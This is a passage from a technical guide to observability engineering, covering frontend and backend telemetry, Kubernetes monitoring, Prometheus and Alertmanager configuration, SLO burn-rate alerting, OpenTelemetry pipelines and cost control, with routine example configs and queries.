<800ms / Poor: >1.8s|Server and network response time| These metrics are collected using the browser's Performance API, available natively in all modern browsers: ```javascript // Using the PerformanceObserver API const observer = new PerformanceObserver((list) => { for (const entry of list.getEntries()) { if (entry.entryType === 'largest-contentful-paint') { sendToCollector({ metric: 'lcp', value: entry.startTime, page: window.location.pathname, connection: navigator.connection?.effectiveType, userAgent: navigator.userAgent, }); } } }); observer.observe({ entryTypes: ['largest-contentful-paint', 'layout-shift', 'longtask'] }); ``` ### Browser Telemetry with OpenTelemetry The OpenTelemetry JavaScript SDK supports browser environments, enabling the same trace propagation model used in backend services to be applied in the browser: ```javascript import { WebTracerProvider } from '@opentelemetry/sdk-trace-web'; import { OTLPTraceExporter } from '@opentelemetry/exporter-trace-otlp-http'; import { ZoneContextManager } from '@opentelemetry/context-zone'; import { B3Propagator } from '@opentelemetry/propagator-b3'; import { registerInstrumentations } from '@opentelemetry/instrumentation'; import { FetchInstrumentation } from '@opentelemetry/instrumentation-fetch'; import { DocumentLoadInstrumentation } from '@opentelemetry/instrumentation-document-load'; const provider = new WebTracerProvider({ resource: new Resource({ [SemanticResourceAttributes.SERVICE_NAME]: 'payment-frontend', [SemanticResourceAttributes.SERVICE_VERSION]: '2.1.0', 'app.environment': 'production', }), }); provider.addSpanProcessor( new BatchSpanProcessor(new OTLPTraceExporter({ url: 'https://telemetry.internal/v1/traces', })) ); provider.register({ contextManager: new ZoneContextManager(), propagator: new B3Propagator(), }); registerInstrumentations({ instrumentations: [ new FetchInstrumentation({ propagateTraceHeaderCorsUrls: [/^https:\/\/api\.example\.com/], }), new DocumentLoadInstrumentation(), ], }); ``` With this configuration, every `fetch()` call from the browser generates a span and injects trace context headers into the HTTP request. The backend service receiving the request continues the trace from the same trace ID. The resulting trace spans both the frontend and backend, giving a complete picture of the user's request. ### Frontend Performance Observability Beyond Web Vitals, production frontend observability requires: **Error tracking:** Uncaught JavaScript errors, unhandled promise rejections, and resource loading failures must be captured and correlated with the user session and browser context. ```javascript window.addEventListener('error', (event) => { telemetry.recordError({ message: event.message, stack: event.error?.stack, filename: event.filename, line: event.lineno, sessionId: getCurrentSessionId(), traceId: getCurrentTraceId(), }); }); window.addEventListener('unhandledrejection', (event) => { telemetry.recordError({ message: event.reason?.message || String(event.reason), type: 'unhandled_rejection', sessionId: getCurrentSessionId(), }); }); ``` **Navigation timing:** Single-page applications have complex navigation patterns. Tracking route changes and their performance is essential: ```javascript // For React applications const withObservability = (Component, routeName) => { return function ObservedComponent(props) { useEffect(() => { const span = tracer.startSpan(`navigate.${routeName}`); return () => span.end(); }, []); return <Component {...props} />; }; }; ``` **Third-party impact:** Many production web applications load dozens of third-party scripts (analytics, chat widgets, payment forms). These can significantly impact performance and are outside the application team's control. RUM should track the performance contribution of third-party resources separately. ### Correlation with Backend Traces The critical capability that distinguishes modern frontend observability from traditional RUM is trace correlation. When the frontend creates a trace span for an API call and injects the trace ID into the request headers, the backend continues that trace. The result is a single trace that spans the browser, the CDN, the API gateway, the backend services, and the database. This end-to-end trace allows engineers to: - Determine whether a slow user experience is caused by frontend JavaScript, network latency, or backend processing - Identify which specific backend service is responsible for a slow API response observed in RUM data - Correlate user-impacting incidents with backend errors without requiring users to report them --- ## 7. Backend Observability ### API Observability An observable API exposes the four golden signals as metrics, produces structured logs for every request and error, and participates in distributed tracing. These three instrumentation points give complete coverage of the API's behavior. **Standard HTTP server metrics** (RED method — Rate, Errors, Duration): ```prometheus # Request rate http_requests_total{method="POST", endpoint="/v1/payments", status="200"} # Error rate http_requests_total{method="POST", endpoint="/v1/payments", status=~"5.."} # Latency distribution (histogram) http_request_duration_seconds_bucket{endpoint="/v1/payments", le="0.1"} http_request_duration_seconds_bucket{endpoint="/v1/payments", le="0.5"} http_request_duration_seconds_bucket{endpoint="/v1/payments", le="1.0"} ``` **USE method for resource observability** (Utilization, Saturation, Errors): ```prometheus # Connection pool utilization db_pool_connections_active / db_pool_connections_max # Thread pool saturation (queue depth) http_server_thread_pool_queue_depth # System call errors process_open_fds / process_max_fds ``` ### Microservices Observability In a microservices architecture, each service is independently deployable and independently observable. The following instrumentation is the minimum standard for any production microservice: **Service-level metrics:** - Request rate (counter) - Error rate by type (counter, with error type label) - Latency distribution (histogram, by endpoint and status) - Active connections / in-flight requests (gauge) - Dependency call rates and latency (per downstream service) - Circuit breaker state (gauge: 0=closed, 1=open) **Structured request log fields:** ```json { "timestamp": "2024-03-15T14:23:45.123Z", "level": "INFO", "event": "http_request", "method": "POST", "path": "/v1/payments", "status": 200, "duration_ms": 145, "request_id": "req-abc123", "trace_id": "4bf92f3577b34da6", "span_id": "00f067aa0ba902b7", "user_id": "user-789", // only if relevant and permitted "service": "payment-service", "version": "2.1.0", "environment": "production" } ``` **Trace attributes for HTTP spans:** ``` http.method: POST http.route: /v1/payments http.status_code: 200 http.request_content_length: 234 http.response_content_length: 145 net.peer.ip: 10.0.0.15 net.peer.port: 443 ``` ### Database Observability Databases are frequently the bottleneck in production systems. Observable database instrumentation covers both the application side (how the application calls the database) and the database side (how the database serves queries). **Application-side database metrics:** ```prometheus # Query duration histogram (by operation type and table) db_query_duration_seconds_bucket{operation="SELECT", table="orders", le="0.01"} # Connection pool metrics db_pool_connections_active{database="orders_db"} db_pool_connections_idle{database="orders_db"} db_pool_wait_duration_seconds_sum{database="orders_db"} # Query error rate db_query_errors_total{operation="INSERT", table="transactions", error_type="deadlock"} ``` **PostgreSQL database-side metrics** (via postgres_exporter): ```prometheus # Active connections vs max pg_stat_database_numbackends{datname="payments"} / pg_settings_max_connections # Transaction rates rate(pg_stat_database_xact_commit{datname="payments"}[5m]) rate(pg_stat_database_xact_rollback{datname="payments"}[5m]) # Cache hit ratio (should be > 99% for OLTP workloads) pg_stat_database_blks_hit / (pg_stat_database_blks_hit + pg_stat_database_blks_read) # Long-running queries pg_stat_activity_max_tx_duration{datname="payments"} # Table bloat and dead tuples (indicates need for VACUUM) pg_stat_user_tables_n_dead_tup{relname="orders"} ``` **Slow query detection:** Database slow queries should produce structured log entries with the query text (sanitized of sensitive values), duration, rows examined, rows returned, and the trace ID of the parent request: ```json { "event": "slow_query", "duration_ms": 2450, "query": "SELECT * FROM transactions WHERE user_id = $1 AND created_at > $2", "rows_returned": 10000, "rows_examined": 500000, "table": "transactions", "trace_id": "4bf92f3577b34da6", "threshold_ms": 100 } ``` ### Service Mesh Observability A service mesh (Istio, Linkerd, Cilium) sits in the network path of all inter-service communication and provides observability automatically, without application code changes. The mesh's sidecar proxy (or eBPF-based dataplane) records metrics and traces for every request passing through it. Service mesh observability benefits: **Uniform telemetry:** Every service gets the same metrics (request rate, error rate, latency) regardless of how the service is implemented or instrumented. This is particularly valuable for legacy services or third-party software that cannot be modified. **mTLS visibility:** The mesh can report on certificate validity, mTLS enforcement violations, and policy denials — security-relevant observability that application code typically does not produce. **L7 traffic analysis:** The mesh can decode HTTP/gRPC traffic and produce per-route, per-method metrics without any application involvement. **Dependency topology:** By observing all inter-service calls, the mesh can automatically generate and maintain a real-time service topology map, showing which services depend on which and what the traffic patterns are. A full trace flow through a service mesh: ``` Browser Request (Chrome) ↓ HTTP/1.1 with traceparent header CDN/Load Balancer ↓ traceparent propagated Istio Ingress Gateway ├── Span: gateway.route_request (2ms) ↓ HTTP/2 with traceparent [Istio Envoy Sidecar] payment-service ├── Span: istio.envoy.inbound (0.5ms) ↓ internal Payment Service Application ├── Span: payment.ProcessPayment (145ms) │ ├── Span: db.query.select_account (12ms) │ ├── Span: fraud.Evaluate (48ms) │ │ ↓ gRPC with traceparent to fraud-service │ │ └── [Istio Sidecar] fraud-service │ │ ├── Span: istio.envoy.inbound (0.3ms) │ │ └── fraud.EvaluateRequest (47ms) │ │ └── redis.GET fraud_model (2ms) │ └── Span: db.query.insert_transaction (45ms) ↓ Response: 200 OK, total duration 150ms ``` --- ## 8. Development Observability ### Observability During Development Observability should not be limited to production. Applying observability practices during development reduces the time to debug issues and ensures that the instrumentation exists before it is needed in production. **Local telemetry setup:** A developer workstation running Docker Compose can replicate the full observability stack locally: ```yaml # docker-compose.observability.yml services: otel-collector: image: otel/opentelemetry-collector-contrib:latest volumes: - ./otel-config.yaml:/etc/otel/config.yaml ports: - "4317:4317" # OTLP gRPC - "4318:4318" # OTLP HTTP prometheus: image: prom/prometheus:latest volumes: - ./prometheus.yml:/etc/prometheus/prometheus.yml ports: - "9090:9090" tempo: image: grafana/tempo:latest volumes: - ./tempo.yaml:/etc/tempo.yaml ports: - "3200:3200" loki: image: grafana/loki:latest ports: - "3100:3100" grafana: image: grafana/grafana:latest environment: - GF_AUTH_ANONYMOUS_ENABLED=true - GF_AUTH_ANONYMOUS_ORG_ROLE=Admin ports: - "3000:3000" depends_on: [prometheus, tempo, loki] ``` With this stack running, application code can send telemetry to `localhost:4317` during development, and the developer can immediately query traces, metrics, and logs in Grafana at `localhost:3000`. ### CI/CD Observability CI/CD pipeline observability extends the observability model to the build and deployment process. Pipelines are distributed systems — they involve multiple runners, shared artifacts, external services — and benefit from the same observability practices applied to production systems. **Build metrics:** - Build duration by stage (histogram) - Test execution time by suite (histogram) - Test success/failure rate (counter) - Artifact size (gauge) - Pipeline queue wait time (histogram) - Cache hit rate (counter) **DORA metrics collection:** DORA metrics can be collected and stored in Prometheus/Mimir for long-term trending and Grafana dashboards: ```python # CI system webhook handler from prometheus_client import Counter, Histogram, push_to_gateway deployment_total = Counter( 'ci_deployments_total', 'Total deployments', ['environment', 'service', 'result'] ) deployment_duration = Histogram( 'ci_deployment_duration_seconds', 'Deployment duration', ['environment', 'service'], buckets=[30, 60, 120, 300, 600, 1200, 3600] ) lead_time = Histogram( 'ci_lead_time_seconds', 'Lead time from commit to deployment', ['environment', 'service'], buckets=[300, 900, 1800, 3600, 7200, 14400, 86400] ) ``` |DevOps Metric|Meaning|Formula|Collection Method| |---|---|---|---| |Lead Time|Time from commit to production deploy|`deploy_timestamp - commit_timestamp`|CI system + VCS webhook| |Deployment Frequency|Number of successful production deploys|`count(deploys) / time_window`|CI/CD pipeline counter| |Change Failure Rate|% of deploys causing incidents|`incidents_after_deploy / total_deploys`|Deploy events + incident events join| |MTTR|Mean time to restore service|`restoration_time - incident_start_time`|Incident management platform| |Build Success Rate|% of CI runs that succeed|`successful_builds / total_builds`|CI platform metrics| |Flaky Test Rate|% of test runs with non-deterministic results|`flaky_failures / total_test_runs`|Test result analysis| ### Debugging with Traces Distributed tracing transforms debugging from a process of reading logs in temporal order and reasoning about causality, to a direct visualization of the request's path and timing. **Trace-driven debugging workflow:** 1. Identify the failing or slow request: Find the trace ID from a log entry, an error report, or a Grafana Tempo search by attribute. 2. Open the trace in Grafana Tempo: The waterfall view shows all spans, their duration, their parent-child relationships, and any errors. 3. Identify the anomalous span: Look for the longest span, for spans with error status, or for spans that deviate from historical norms (Tempo can show historical percentile comparison). 4. Examine span attributes and events: Every span should carry enough context to understand what it was doing. A database span should show the query; an HTTP client span should show the URL and status; a business logic span should show the relevant entity IDs. 5. Navigate to logs: Using the trace ID embedded in log entries (and the Loki-Tempo correlation in Grafana), open the logs for the specific span's time range. The trace ID filter narrows logs to exactly the request being investigated. --- ## 9. Kubernetes Observability ### The Kubernetes Observability Problem Kubernetes introduces a layer of abstraction between workloads and the underlying infrastructure. Applications run in pods that are scheduled to nodes; pods may be evicted and rescheduled; nodes may be replaced; the entire cluster state is dynamic. Effective Kubernetes observability requires monitoring at every layer of this abstraction: the infrastructure (nodes), the platform (Kubernetes objects), the runtime (containers), and the workloads (applications). ``` Layer 5: Application (business logic metrics, traces, logs) Layer 4: Container Runtime (CPU, memory, network, filesystem per container) Layer 3: Kubernetes Platform (pod state, deployment health, HPA activity) Layer 2: Node OS (CPU, memory, disk, network at OS level) Layer 1: Physical/VM Infrastructure (hardware health, hypervisor metrics) ``` Each layer requires different tools and produces different metrics. A problem at any layer can manifest as a symptom at a higher layer. A node memory pressure event (Layer 2) causes pod evictions (Layer 3), which causes application errors (Layer 5). Without visibility at Layer 2 and 3, the Layer 5 symptom appears without explanation. ### Prometheus Operator The Prometheus Operator is a Kubernetes operator that manages Prometheus and Alertmanager instances as Kubernetes custom resources. It eliminates the need to manually manage Prometheus configuration files. **Core custom resources:** `Prometheus` — Defines a Prometheus instance, including storage, retention, resource limits, and which ServiceMonitors to select: ```yaml apiVersion: monitoring.coreos.com/v1 kind: Prometheus metadata: name: prometheus namespace: monitoring spec: replicas: 2 retention: 15d storage: volumeClaimTemplate: spec: storageClassName: fast-ssd resources: requests: storage: 50Gi serviceMonitorSelector: matchLabels: monitoring: prometheus ruleSelector: matchLabels: monitoring: prometheus alerting: alertmanagers: - namespace: monitoring name: alertmanager port: web ``` `ServiceMonitor` — Defines scrape configuration for a service. Teams create ServiceMonitors for their own services without needing to modify the central Prometheus configuration: ```yaml apiVersion: monitoring.coreos.com/v1 kind: ServiceMonitor metadata: name: payment-service namespace: payments labels: monitoring: prometheus # matches Prometheus serviceMonitorSelector spec: selector: matchLabels: app: payment-service endpoints: - port: metrics path: /metrics interval: 15s scheme: https tlsConfig: caFile: /etc/prometheus/certs/ca.crt ``` `PrometheusRule` — Defines alert rules and recording rules as Kubernetes resources: ```yaml apiVersion: monitoring.coreos.com/v1 kind: PrometheusRule metadata: name: payment-service-alerts namespace: payments labels: monitoring: prometheus spec: groups: - name: payment-service interval: 30s rules: - alert: PaymentServiceHighErrorRate expr: | sum(rate(http_requests_total{namespace="payments",status=~"5.."}[5m])) / sum(rate(http_requests_total{namespace="payments"}[5m])) > 0.05 for: 5m labels: severity: critical team: payments annotations: summary: "Payment service error rate > 5%" description: "Error rate is {{ $value | humanizePercentage }} for the last 5 minutes" runbook_url: "https://runbooks.internal/payment-high-error-rate" ``` ### Kubernetes Monitoring Tool Stack |Tool|Layer Monitored|Deployment|Key Metrics| |---|---|---|---| |node_exporter|Node OS (CPU, memory, disk, network)|DaemonSet|`node_cpu_seconds_total`, `node_memory_MemAvailable_bytes`, `node_disk_io_time_seconds_total`| |kube-state-metrics|Kubernetes object state|Deployment (single)|`kube_pod_status_phase`, `kube_deployment_status_replicas_available`, `kube_node_status_condition`| |cAdvisor (kubelet)|Container resource usage|Built into kubelet|`container_cpu_usage_seconds_total`, `container_memory_working_set_bytes`| |Prometheus Operator|Prometheus lifecycle|CRD-based operator|Manages Prometheus config from ServiceMonitors| |Grafana Agent / Alloy|Unified telemetry agent|DaemonSet|Scrapes metrics, ships logs, forwards traces| |Loki + Promtail|Log collection and storage|Promtail DaemonSet|All container logs via `/var/log/pods/`| ### Essential Kubernetes Alerts The following alert rules cover the most critical Kubernetes failure modes: ```yaml # Node conditions - alert: KubernetesNodeNotReady expr: kube_node_status_condition{condition="Ready",status="true"} == 0 for: 2m labels: severity: critical # Pod failures - alert: KubernetesPodCrashLooping expr: rate(kube_pod_container_status_restarts_total[15m]) * 60 * 15 > 5 for: 0m labels: severity: warning # Deployment health - alert: KubernetesDeploymentReplicasMismatch expr: | kube_deployment_spec_replicas != kube_deployment_status_replicas_available for: 15m labels: severity: warning # Persistent volume - alert: KubernetesPersistentVolumeFillingUp expr: | kubelet_volume_stats_available_bytes / kubelet_volume_stats_capacity_bytes < 0.15 for: 1m labels: severity: warning # Resource pressure - alert: KubernetesMemoryPressure expr: kube_node_status_condition{condition="MemoryPressure",status="true"} == 1 for: 2m labels: severity: critical # HPA at maximum - alert: KubernetesHPAMaxReplicasReached expr: | kube_horizontalpodautoscaler_status_current_replicas == kube_horizontalpodautoscaler_spec_max_replicas for: 15m labels: severity: warning ``` ### Log Collection in Kubernetes Container logs in Kubernetes are written to stdout/stderr and are available at `/var/log/pods/<namespace>_<pod>_<uid>/<container>/` on each node. Promtail (Loki's log collector) runs as a DaemonSet and tails these files, enriching each log line with Kubernetes metadata labels before shipping to Loki: ```yaml # promtail-config.yaml scrape_configs: - job_name: kubernetes-pods kubernetes_sd_configs: - role: pod pipeline_stages: - cri: {} # parse CRI log format - json: # parse structured JSON logs expressions: level: level trace_id: trace_id service: service - labels: level: trace_id: relabel_configs: - source_labels: [__meta_kubernetes_namespace] target_label: namespace - source_labels: [__meta_kubernetes_pod_name] target_label: pod - source_labels: [__meta_kubernetes_pod_container_name] target_label: container - source_labels: [__meta_kubernetes_pod_label_app] target_label: app ``` --- ## 10. Observability Architecture for Large Infrastructure ### Architectural Principles for Scale At small scale — a handful of services, a single Kubernetes cluster — the observability stack can be simple: a single Prometheus instance, a single Loki instance, a Grafana deployment. At large scale — hundreds of services, multiple clusters, hybrid cloud — the observability infrastructure must itself be designed with the same reliability and scalability principles applied to production workloads. Key principles: **Separation of collection from storage:** Collection agents (OTel Collector, Promtail, node_exporter) run close to the data sources and should be lightweight and resilient. Storage systems (Mimir, Loki, Tempo) can be centralized and scaled independently. **Federation and hierarchy:** A large infrastructure often uses a federated Prometheus model, where each cluster runs its own Prometheus (shard) and a central Prometheus (or Mimir) aggregates cross-cluster data. Grafana queries the central tier for global dashboards and the local shards for per-cluster detail. **Multi-tenancy:** In shared infrastructure, teams should be able to query their own telemetry without access to other teams' data. Loki, Mimir, and Tempo all support multi-tenancy via tenant headers. The OTel Collector and Grafana authentication layer enforce tenant isolation. **High availability:** Production observability infrastructure must itself be highly available. A Prometheus outage that coincides with a production incident is especially damaging. Prometheus HA involves running two identical instances scraping the same targets, with deduplication handled by Alertmanager or Mimir. ### Reference Architecture: Enterprise Scale ``` ┌─────────────────────────────────────────────────────────────────────┐ │ Application Layer │ │ │ │ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ │ │ Service A │ │ Service B │ │ Service C │ │ │ │ OTel SDK │ │ OTel SDK │ │ OTel SDK │ │ │ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ │ └─────────┼─────────────────┼─────────────────┼───────────────────────┘ │ OTLP │ OTLP │ OTLP ▼ ▼ ▼ ┌─────────────────────────────────────────────────────────────────────┐ │ OTel Collector Layer │ │ │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ OTel Collector (DaemonSet / Sidecar) │ │ │ │ │ │ │ │ Receivers: OTLP, Prometheus scrape │ │ │ │ Processors: batch, memory_limiter, tail_sampling, │ │ │ │ resource enrichment, attribute filtering │ │ │ │ Exporters: OTLP/Mimir, OTLP/Tempo, OTLP/Loki │ │ │ └────────────────────────────────────────────────────────── ┘ │ └─────────────────────────────────────────────────────────────────────┘ │ │ │ │ Remote Write │ OTLP │ Push API ▼ ▼ ▼ ┌───────────────────┐ ┌───────────────────┐ ┌───────────────────┐ │ Grafana Mimir │ │ Grafana Tempo │ │ Grafana Loki │ │ (Metrics) │ │ (Traces) │ │ (Logs) │ │ │ │ │ │ │ │ S3 backend │ │ S3 backend │ │ S3 backend │ │ Multi-tenant │ │ Multi-tenant │ │ Multi-tenant │ │ Long retention │ │ 14d default │ │ 30d default │ └─────────┬─────────┘ └────────┬───────────┘ └────────┬──────────┘ │ │ │ └─────────────────────┼────────────────────────┘ ▼ ┌────────────────────┐ │ Grafana │ │ │ │ Data sources: │ │ - Mimir (metrics)│ │ - Tempo (traces) │ │ - Loki (logs) │ │ │ │ Dashboards │ │ Alerting │ │ OnCall │ └────────┬──────────┘ │ ▼ ┌────────────────────┐ │ Alertmanager │ │ │ │ PagerDuty │ │ Slack │ │ OpsGenie │ └────────────────────┘ ``` ### Multi-Cluster Architecture For multiple Kubernetes clusters, the observability architecture adds a cluster-level Prometheus layer before the central aggregation: **Per-cluster (local) Prometheus:** - Scrapes all cluster-local targets - Evaluates cluster-local alert rules (pod failures, node pressure, deployment health) - Retains 2 days of data locally for immediate investigation - Remote-writes all metrics to central Mimir **Central Mimir:** - Receives remote writes from all cluster Prometheuses - Long-term retention (1 year+) - Cross-cluster queries - Multi-tenant isolation (one tenant per team) **Cross-cluster federation query:** ```promql # Query across all clusters — Mimir handles federation sum by (cluster, namespace) ( rate(http_requests_total{status=~"5.."}[5m]) ) ``` ### Capacity Planning for Observability Infrastructure |Component|Scaling Dimension|Rule of Thumb|Notes| |---|---|---|---| |Prometheus|Active time series|2-3 bytes/sample in RAM; 1.3 bytes/sample on disk|1M series ≈ 5GB RAM| |Mimir Ingester|Write throughput|~1M samples/sec per ingester|3 replicas minimum| |Loki Ingester|Log throughput|~1MB/s per ingester per tenant|Scale with log volume| |Tempo Ingester|Trace throughput|~50MB/s per ingester|Scale with trace sampling rate| |OTel Collector|Telemetry throughput|1000 spans/sec per single-core collector|Scale horizontally| |Grafana|Dashboard users|50-200 concurrent users per instance|Cache layer helps| --- ## 11. Alerting and Incident Management ### Alert Design Philosophy Alerting is the bridge between observability and operational response. A well-designed alert system wakes up the right engineer at the right time with enough context to act. A poorly designed alert system produces noise that trains engineers to ignore it, delays real incident detection, and degrades team health through interrupted sleep and alarm fatigue. The core principles of alert design: **Every alert must be actionable.** If the on-call engineer receives an alert and there is no action they should take, the alert should not exist. Non-actionable alerts should be either eliminated or converted to dashboard annotations. **Every alert must have a runbook.** The annotation on every PrometheusRule should include a `runbook_url` pointing to a documented response procedure. During an incident at 3am, an engineer should be able to follow the runbook without needing to reason from first principles. **Alert on symptoms, not causes.** Alert on user-facing impact: error rate elevated, latency degraded, service unreachable. Do not alert on potential causes that may or may not produce symptoms: CPU elevated, disk 70% full. Cause-level alerts create noise without corresponding user impact; they are better expressed as dashboard warnings. **Calibrate severity.** Not every problem requires immediate wakeup. A well-structured severity model: - **P1/Critical:** User-facing impact right now, requires immediate wakeup. SLO burn rate alert. - **P2/High:** Likely user impact within hours if unaddressed. Acknowledge during business hours. - **P3/Medium:** No immediate impact, but trending toward a problem. Ticket for next sprint. - **P4/Low:** Informational. Dashboard only. ### Alertmanager Architecture Alertmanager is Prometheus's companion for alert routing, deduplication, grouping, and notification delivery. ``` Prometheus ─── alerts ──► Alertmanager │ ┌─────▼──────┐ │ Dedup │ Remove duplicate alerts (same │ │ alert from multiple Prometheus) └─────┬──────┘ │ ┌─────▼──────┐ │ Grouping │ Batch related alerts into │ │ single notification └─────┬──────┘ │ ┌─────▼──────┐ │ Inhibition │ Suppress child alerts when │ │ parent alert is firing └─────┬──────┘ │ ┌─────▼──────┐ │ Routing │ Route to correct receiver │ │ based on labels └─────┬──────┘ │ ┌──────────┼──────────┐ ▼ ▼ ▼ PagerDuty Slack OpsGenie ``` **Alertmanager configuration:** ```yaml global: resolve_timeout: 5m slack_api_url: 'https://hooks.slack.com/services/...' route: group_by: ['alertname', 'cluster', 'service'] group_wait: 30s # wait before sending first alert (allow grouping) group_interval: 5m # interval for sending follow-up notifications repeat_interval: 3h # re-send if still firing receiver: 'default-slack' routes: - match: severity: critical receiver: 'pagerduty-critical' continue: true # also route to default - match: severity: critical team: payments receiver: 'pagerduty-payments-team' - match_re: service: '(payment|fraud|settlement)' receiver: 'payments-slack' receivers: - name: 'default-slack' slack_configs: - channel: '#alerts' title: '[{{ .Status | toUpper }}{{ if eq .Status "firing" }}:{{ .Alerts.Firing | len }}{{ end }}] {{ .CommonLabels.alertname }}' text: >- {{ range .Alerts }} *Alert:* {{ .Annotations.summary }} *Description:* {{ .Annotations.description }} *Runbook:* {{ .Annotations.runbook_url }} {{ end }} - name: 'pagerduty-critical' pagerduty_configs: - service_key: '${PAGERDUTY_SERVICE_KEY}' description: '{{ .CommonLabels.alertname }}: {{ .CommonAnnotations.summary }}' severity: '{{ if eq .CommonLabels.severity "critical" }}critical{{ else }}warning{{ end }}' inhibit_rules: - source_match: severity: 'critical' alertname: 'ClusterDown' target_match: severity: 'warning' equal: ['cluster'] # suppress warnings when cluster is down ``` ### Multi-Window Burn Rate Alert Rules The most production-appropriate SLO alerting strategy uses multiple observation windows to balance sensitivity (catching real problems quickly) with specificity (not firing for transient spikes): ```yaml # Payment API SLO: 99.9% over 28 days groups: - name: payment-api-slo rules: # Fast burn: consuming budget at 14.4x rate over last hour # Will exhaust 28-day budget in 2 days - alert: PaymentAPIErrorBudgetFastBurn expr: | ( sum(rate(http_requests_total{service="payment-api",status=~"5.."}[1h])) / sum(rate(http_requests_total{service="payment-api"}[1h])) ) > (14.4 * 0.001) and ( sum(rate(http_requests_total{service="payment-api",status=~"5.."}[5m])) / sum(rate(http_requests_total{service="payment-api"}[5m])) ) > (14.4 * 0.001) labels: severity: critical annotations: summary: "Payment API burning error budget at 14.4x rate" runbook_url: "https://runbooks.internal/payment-error-budget" # Slow burn: consuming budget at 3x rate over last day # Will exhaust 28-day budget in 9 days - alert: PaymentAPIErrorBudgetSlowBurn expr: | ( sum(rate(http_requests_total{service="payment-api",status=~"5.."}[6h])) / sum(rate(http_requests_total{service="payment-api"}[6h])) ) > (3 * 0.001) and ( sum(rate(http_requests_total{service="payment-api",status=~"5.."}[30m])) / sum(rate(http_requests_total{service="payment-api"}[30m])) ) > (3 * 0.001) labels: severity: warning annotations: summary: "Payment API burning error budget at 3x rate" ``` ### Recording Rules Recording rules pre-compute expensive or frequently-used PromQL expressions and store the result as a new time series. This improves dashboard load times and reduces query load on Prometheus: ```yaml groups: - name: http_metrics interval: 30s rules: # Pre-compute per-service error rate (used in many dashboards) - record: job:http_error_rate:ratio_rate5m expr: | sum(rate(http_requests_total{status=~"5.."}[5m])) by (service) / sum(rate(http_requests_total[5m])) by (service) # Pre-compute p99 latency per service - record: job:http_request_duration_p99:5m expr: | histogram_quantile(0.99, sum(rate(http_request_duration_seconds_bucket[5m])) by (le, service) ) # Pre-compute request rate per service - record: job:http_request_rate:rate5m expr: | sum(rate(http_requests_total[5m])) by (service) ``` --- ## 12. Observability Data Pipelines ### The Telemetry Pipeline Problem At production scale, telemetry data volumes are substantial: - A 100-service platform at 1,000 RPS each generates 100,000 traces/second (at 100% sampling) - Each trace averages 10 spans at 500 bytes each: 500MB/second of trace data - The same platform generates 10,000 log lines/second at 500 bytes each: 5MB/second of log data - Prometheus metrics scrape 2,000,000 time series every 15 seconds: millions of data points/minute Without a pipeline architecture that can filter, sample, and buffer this data, the storage costs are prohibitive and the query systems are overwhelmed. ### OpenTelemetry Collector as Pipeline The OTel Collector's pipeline model allows complex data transformation before data reaches storage: **Tail-based sampling** is the most impactful pipeline capability for trace data. Unlike head-based sampling (where the decision to sample is made at the start of a trace, before the outcome is known), tail-based sampling makes the decision after the entire trace is complete. This allows 100% capture of error traces and slow traces, while discarding 95-99% of successful fast traces. Configuration of tail sampling: ```yaml processors: tail_sampling: decision_wait: 10s # wait up to 10s for all spans to arrive num_traces: 100000 # hold up to 100k traces in memory simultaneously expected_new_traces_per_sec: 10000 policies: # Always keep error traces - name: keep-errors type: status_code status_code: {status_codes: [ERROR]} # Always keep slow traces (> 1s) - name: keep-slow type: latency latency: {threshold_ms: 1000} # Keep traces from specific high-value services - name: keep-payment-traces type: string_attribute string_attribute: key: service.name values: [payment-service, fraud-service] # Keep 5% of remaining traces - name: probabilistic-fallback type: probabilistic probabilistic: {sampling_percentage: 5} ``` With this configuration, a system generating 10,000 traces/second retains perhaps 200-500 meaningful traces/second — a reduction of 95-98% in storage costs while retaining 100% of actionable traces. ### Scaling the Collection Layer For large infrastructure, a single OTel Collector is a single point of failure and a throughput bottleneck. The Collector is designed to scale horizontally in two deployment patterns: **Agent mode:** A Collector instance runs on each node (as a DaemonSet in Kubernetes) and collects local telemetry. Agents forward to a central tier. **Gateway mode:** A pool of Collector instances (a Kubernetes Deployment) receives from agents and applies expensive operations (tail sampling, cross-service enrichment). Gateways forward to storage backends. ``` [Application] ──OTLP──► [Collector Agent (DaemonSet)] │ │ OTLP (load balanced) ▼ [Collector Gateway (Deployment, 3-10 replicas)] │ ┌───────────┼───────────┐ ▼ ▼ ▼ [Mimir] [Tempo] [Loki] ``` **Kafka as a telemetry buffer:** For very high volume environments, inserting Kafka between the collection and storage layers provides: - **Backpressure buffering:** If Loki is slow, log data queues in Kafka rather than being dropped - **Fan-out:** Multiple consumers can read the same telemetry stream independently - **Replay:** Telemetry can be reprocessed if storage systems are updated or replaced ```yaml # OTel Collector exporter to Kafka exporters: kafka: brokers: [kafka-1:9092, kafka-2:9092, kafka-3:9092] topic: otel-traces encoding: otlp_proto # Separate consumer writes Kafka → Tempo # Using kafka-consumer-group approach with OTel Collector receiver receivers: kafka: brokers: [kafka-1:9092] topic: otel-traces group_id: tempo-consumer ``` --- ## 13. Observability Cost Optimization ### The Economics of Observability Observability infrastructure has real and significant costs. At enterprise scale: - Metrics storage: millions of time series × retention period × bytes/sample - Log storage: gigabytes to terabytes per day - Trace storage: even at 5% sampling, traces are the most data-dense telemetry type - Compute: query engines, collection agents, alerting infrastructure Without active cost management, observability costs grow proportionally with the number of services and can reach 10-30% of total infrastructure spend. The goal is not to minimize observability investment — good observability pays for itself in reduced MTTR — but to ensure that spending is proportional to value. ### High-Cardinality Metrics Management High-cardinality metrics are the primary driver of Prometheus memory usage and storage costs. A metric with 1,000,000 unique label combinations creates 1,000,000 time series, each requiring memory in Prometheus. **Detection:** ```promql # Find metrics with highest cardinality topk(10, count by (__name__)({__name__=~".+"})) # Find labels with highest cardinality for a specific metric count by (status_code)(http_requests_total) ``` **Mitigation strategies:** 1. **Remove high-cardinality labels at collection:** Use relabeling in Prometheus or the OTel Collector to drop or hash labels before they reach storage. 2. **Replace exact values with bucketed categories:** Instead of `user_id`, use `user_tier` (free, paid, enterprise). Instead of exact `status_code`, use `status_class` (2xx, 4xx, 5xx). 3. **Use recording rules to pre-aggregate:** If you only ever need per-service error rates (not per-endpoint-per-service), create a recording rule that aggregates away the endpoint label. 4. **Implement metric allow-lists:** In the OTel Collector or Prometheus, configure explicit allow-lists of metrics and label combinations that should be collected. Everything else is dropped. ### Log Volume Management Log volumes can grow rapidly in verbose applications. Key cost controls: **Log level enforcement:** Production workloads should emit INFO or higher. Debug logs should be disabled by default and enabled dynamically for specific services during incident investigation. **Structured log 